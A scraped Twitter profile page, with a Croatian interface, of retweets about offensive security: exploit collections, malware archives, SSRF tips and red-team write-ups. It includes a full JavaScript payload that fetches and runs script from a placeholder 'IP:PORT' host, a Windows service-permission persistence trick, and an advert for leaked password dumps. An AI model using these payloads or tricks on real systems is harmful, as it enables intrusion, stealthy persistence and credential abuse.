Tweetovi

Blokirali ste korisnika/cu @_csuki_

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @_csuki_

  1. proslijedio/la je Tweet
    prije 20 sati

    It's so hilarious that hackers are posting stuff like reverse engineering tutorials on pornhub because YouTube bans them. "Boss, I swear, it's not how it looks, I was watching a conference talk!"

    Poništi
  2. proslijedio/la je Tweet
    27. sij

    [PoC] MS-Windows Local Vulnerabilities Collection cve-2019-14969 cve-2019-5701 cve-2019-1378 cve-2019-12757 cve-2019-13382 cve-2019-13142 cve-2019-19248 cve-2019-0841 cve-2018-0952 cve-2019-5674 cve-2019-19363 cve-2019-1405 cve-2019-1322 CVE-2019-12758

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  3. proslijedio/la je Tweet
    26. sij
    Poništi
  4. proslijedio/la je Tweet
    22. sij

    Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: Enjoy! For information about our current training offerings, information can be found here: (4/4)

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    18. sij

    Here is what is left to add: -18,693,000 malware samples (I'm not joking...) -Fix archives, so Google and ESET fuck off -rootkit.ru rootkit series -Virus Bulletin 1989 - Present -11 Vx Zines -Ransomware paper series -100+ leaked vx projects Send me more stuff!

    Poništi
  6. proslijedio/la je Tweet
    18. sij

    ": a Stealthy Lateral Movement Strategy" is now available to read Read if interested to see a new practical lateral movement Demo (TDS (MS SQL) & FTP): Prototype will be released soon

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    31. pro 2019.

    This could be said about research: "Whether you succeed or not is irrelevant, there is no such thing. Making your unknown known is the important thing--and keeping the unknown always beyond you." - Georgia O'Keefe

    Poništi
  8. proslijedio/la je Tweet
    26. pro 2019.

    New Year's Resolutions for ICS Security

    Poništi
  9. proslijedio/la je Tweet
    25. pro 2019.

    Binary exploitation / reverse engineering course A collection of resources for linux reverse engineering A tool to fastly get all javascript sources/files ,

    Poništi
  10. proslijedio/la je Tweet
    25. pro 2019.

    Friends, I am very pleased to announce that I have managed to re-assemble the original 29a archives in totality. All zines are now present in what was once their original form. 1luv -smelly__vx

    Poništi
  11. proslijedio/la je Tweet
    26. pro 2019.

    SSRF Break Points [1/2] - Anything that accepts a URL - File upload option? Change type="file" to type="url" and submit a URL. - Image upload? Submit a svg containing "image" element with the payload in xlink:href attribute. Try ImageMagick exploits.

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    21. pro 2019.

    Live video of the red team when the shell connect

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    20. pro 2019.

    new blog post: No Shells Required - a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

    Poništi
  14. proslijedio/la je Tweet

    I miss the 90’s, back when you could destroy the world with 1.44 MB.

    Poništi
  15. proslijedio/la je Tweet
    15. pro 2019.

    Its amazing that a lot of people still find and reference my Modern Memory Safety training. That was exactly the goal of open sourcing it. If you’re interested in C/C++ vulnerability research you should check it out

    Poništi
  16. proslijedio/la je Tweet
    10. pro 2019.

    A remote JS reverse shell payload by <script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>

    Poništi
  17. proslijedio/la je Tweet
    7. pro 2019.

    Persistency tip: if you have admin rights for a moment, just add “WD” or “DC” to SDDL of any of Windows Services. It will allow you to elevate your privileges back any moment you need. Good luck finding this, Blue Team...

    Poništi
  18. proslijedio/la je Tweet
    5. pro 2019.

    Password dumps Collections 1-5's (.txt only): 27.47 B Records (806GB) 296 GB of usernames 260 GB of domain names 250 GB of passwords Unique: 18 GB of usernames (1.296.186.909) 2.3 GB of domain names (67.031.505) 16 GB of passwords (958.883.636)

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    7. pro 2019.

    I recently exploited an XXE with a very cool trick and wrote a blog post tl;dr; Exploiting XXE to read files when HTTP OOB is not allowed but errors are enabled :D

    Poništi
  20. proslijedio/la je Tweet
    2. pro 2019.

    Socat - nice description & howTo for such a useful tool !

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·